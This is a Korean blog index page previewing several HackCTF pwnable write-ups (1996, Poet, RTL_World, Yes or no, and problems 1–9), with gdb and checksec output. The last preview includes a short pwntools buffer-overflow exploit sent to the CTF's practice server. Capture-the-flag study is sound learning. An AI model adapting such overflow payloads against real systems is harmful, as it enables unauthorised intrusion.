CTF_Write_UP/HackCTF (21) 썸네일형 리스트형 [HackCTF] 1996 시작 안녕하세요 :D 200점짜리 문제들이 더 쉬운 건 기분 탓이겠죠..? 이번 문제도 환경변수를 받아오는 컨셉을 잡고 있었는데 단순 BOF가 터지네요 ㅋㅋㅋ 시작해보죠!! Write UP root@goorm:/workspace/LCH_Server/HackCTF/14.1996# ./1996 Which environment variable do you want to read? USER USER=root 환경변수를 받아옵니다. getenv() 같은 함수가 있겠네요. gdb-peda$ pd main Dump of assembler code for function main: 0x00000000004008cd : push rbp 0x00000000004008ce : mov rbp,rsp 0x000000000040.. [HackCTF] Poet 시작 안녕하세요 :D HackCTF 문제만 계속 풀고 있습니다 ㅎㅎ 너무 어렵게만 생각하는건지.. 풀고 보면 허무한 문제들이 많네요ㅠ 시작해보죠!! Write UP root@goorm:/workspace/LCH_Server/HackCTF/13.Poet# ./poet ********************************************************** * 우리는 2018년의 시인(poet)을 찾고 있습니다. * * 플래그상을 받고 싶다면 지금 한 줄의 시를 쓰세요! * ********************************************************** Enter : > aaaa 이 시의 저자는 누구입니까? > bbbb +-------------------------.. [HackCTF] RTL_World 시작 안녕하세요 :D 이 사이트 참 좋은 것 같습니다 ㅎㅎ 힐링하는 느낌 들고 좋네요. 바로 이어서 첫 200점짜리 문제, RTL World 풀어볼게요!! Write UP root@goorm:/workspace/LCH_Server/HackCTF/11.RTL_world# ./rtl_world 세그멘테이션 오류 (core dumped) ??? nc로 붙여볼게요. NPC [Village Presient] : Binary Boss made our village fall into disuse... If you Have System Armor && Shell Sword. You can kill the Binary Boss... Help me Pwnable Hero... :( Your Gold : 1000 =====.. [HackCTF] Yes or no 시작 안녕하세요 :D 어제 쓰다 말았던 HackCTF Write up이에요. 150점 짜리 문제 중 마지막 10번 문제, Yes or no!! 시작해봐요. Write UP root@goorm:/workspace/LCH_Server/HackCTF/10.Yes_or_No# ./yes_or_no Show me your number~! 0 Sorry. You can't come with us 숫자 하나를 달라고 해서 주니깐 함께 갈 수 없다며 매정하게 종료하네요. gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : disabled RELRO : Partial NX만 켜져있습니다. 쉘코드는 못쓰겠네요. gdb-peda$ pd mai.. [HackCTF] 1 ~ 9번 문제 시작 안녕하세요 :D 포너블 공부하다가 좋은 사이트 찾아서!! 문제를 풀고 있어요. 처음엔 아주 기초적인 문제라 빠르게 빠르게 넘어갔습니다 ㅎㅎ Write UP도 설명없이 적도록 할게요 시작해보죠!! (HackCTF : https://ctf.j0n9hyun.xyz/) Write UP 1. Basic_BOF #1 from pwn import * #p = process("./bof_basic") p = remote("ctf.j0n9hyun.xyz", 3000) key = 0xdeadbeef payload = "" payload += "A" * 40 payload += p32(key) p.sendline(payload) p.interactive() 키값 바꾸는 문제!! pwnable.kr에서 많이 본 친구였습.. 이전 1 2 3 다음